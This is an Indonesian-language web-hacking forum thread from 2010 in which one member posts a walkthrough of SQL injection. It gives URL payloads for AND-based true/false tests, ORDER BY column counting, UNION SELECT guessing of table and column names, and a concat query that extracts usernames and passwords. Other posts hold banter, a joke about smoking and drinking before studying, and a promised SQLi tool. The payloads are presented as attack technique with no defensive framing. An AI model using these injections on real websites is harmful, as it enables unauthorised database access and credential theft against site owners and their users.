Index of \SQLi

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
User avatar
Digital Cat
Posts: 437
Joined: Fri Jun 26, 2009 6:13 pm
Location: USA
Contact:

Re: Index of \SQLi

Post by Digital Cat » Thu May 13, 2010 11:08 pm

@ecko :

wah..
sori.. sori.. ecko,
blon kelar nih,
gw uji coba toolny..

masih ada errorny dikit lagi..

sabar yach..

sori jg kalo udah lama menunggu..

key..

User avatar
Digital Cat
Posts: 437
Joined: Fri Jun 26, 2009 6:13 pm
Location: USA
Contact:

Re: Index of \SQLi

Post by Digital Cat » Fri May 14, 2010 3:37 pm

True-False

cth:.php?id=1

Metode AND

Code: Select all

.php?id=1'+and+1=1-- f > True
.php?id=1'+and+1=0-- f >False
Metode Order By

Code: Select all

.php?id=1'+order+by+1+--+ >True
.php?id=1'+order+by+100+--+ >False
.php?id=1'+order+by+2+--+ >False
Subject:
Users,Admins >False
User,Admin >True

Contoh :

Code: Select all

.php?id=-1'+union+select+1+from+user+--+ >True
.php?id=-1'+union+select+1+from+users+--+ >False
-------------

User avatar
Digital Cat
Posts: 437
Joined: Fri Jun 26, 2009 6:13 pm
Location: USA
Contact:

Re: Index of \SQLi

Post by Digital Cat » Fri May 14, 2010 3:54 pm

...........................
Last edited by Digital Cat on Sun May 16, 2010 9:19 pm, edited 8 times in total.

User avatar
Digital Cat
Posts: 437
Joined: Fri Jun 26, 2009 6:13 pm
Location: USA
Contact:

Re: Index of \SQLi

Post by Digital Cat » Fri May 14, 2010 4:04 pm

Subject :
Username,Passwort > False
Name,Password > True

Contoh:

Code: Select all

.php?id=-1'+union+select+username+from+user+--+ >False
.php?id=-1'+union+select+passwort+from+user+--+ >False
.php?id=-1'+union+select+name+from+user+--+ >True
.php?id=-1'+union+select+password+from+user+--+ >True
Subject:Limit
NB:
Name+Password+User =True
cth:

Code: Select all

.php?id=-1'+union+select+concat(name,0x3a,password)+from+user+limit+0,1+--+ >False
.php?id=-1'+...+...+...(..,..,..)+from+user+limit+1,1+--+ >True

User avatar
tlolor_x
Posts: 30
Joined: Sat Oct 03, 2009 4:20 pm
Contact:

Re: Index of \SQLi

Post by tlolor_x » Fri May 14, 2010 8:24 pm

:love: :love: :love: wew kk digital cat keren............

jadi pingin neh belajar yg begituan................

oya awalnya kita harus ngapain kk? :kaca:
Pembaca Setia

User avatar
Digital Cat
Posts: 437
Joined: Fri Jun 26, 2009 6:13 pm
Location: USA
Contact:

Re: Index of \SQLi

Post by Digital Cat » Fri May 14, 2010 11:47 pm

@tlolor_x :
wah..
awalny ya,kalo gw sih..
he2x.. :D

1.Rokok Malboro putih..
2.Mension 2 botol (2 botol aja jgn banyak2x + campuranny, air buah jeruk..
jgn lupa tuh,penting banget
he2x..
3.Yach.. mabok dah kita gak jadi belajar,yang minum mension 2 botol, gimana mau belajar..

hagagagaga :ngakak:

:ngakak: hagagaga..

gw masih newbie nih..
gak ngerti apa2x..

User avatar
tlolor_x
Posts: 30
Joined: Sat Oct 03, 2009 4:20 pm
Contact:

Re: Index of \SQLi

Post by tlolor_x » Sat May 15, 2010 1:35 am

Digital Cat wrote:@tlolor_x :
wah..
awalny ya,kalo gw sih..
he2x.. :D

1.Rokok Malboro putih..
2.Mension 2 botol (2 botol aja jgn banyak2x + campuranny, air buah jeruk..
jgn lupa tuh,penting banget
he2x..
3.Yach.. mabok dah kita gak jadi belajar,yang minum mension 2 botol, gimana mau belajar..

hagagagaga :ngakak:

:ngakak: hagagaga..

gw masih newbie nih..
gak ngerti apa2x..

:omg: :omg: jiah ngajarin jelek neh

:pusing: :pusing: tapi enaknya ditambah mc donald klo gk tomy stenly biar lebih maknyos wkwkwkwkwkwkwkwk...........

:maaf: sama2 newbie harus saling berbagi dunk hehehehehehehe

kapan digital sqli dikeluarkan nampaknya mantab tuch............. :kaca:
Pembaca Setia

User avatar
Digital Cat
Posts: 437
Joined: Fri Jun 26, 2009 6:13 pm
Location: USA
Contact:

Re: Index of \SQLi

Post by Digital Cat » Sat May 15, 2010 10:00 am

@tlolor :
digital sqli tool ya..
dikit lagi gan..
sabar ya..

wah banyak yang nungguin ternyata toh..

makasih dah nungguin,
tapi sabar ya..

User avatar
tlolor_x
Posts: 30
Joined: Sat Oct 03, 2009 4:20 pm
Contact:

Re: Index of \SQLi

Post by tlolor_x » Sat May 15, 2010 2:04 pm

:tapa: :tapa: :tapa: Kutungguin selalu.......................

:sokkeren: :sokkeren: DUKUNGANKU BUAT DIGITAL CAT.......................
Pembaca Setia

Post Reply

Return to “Web Hacking”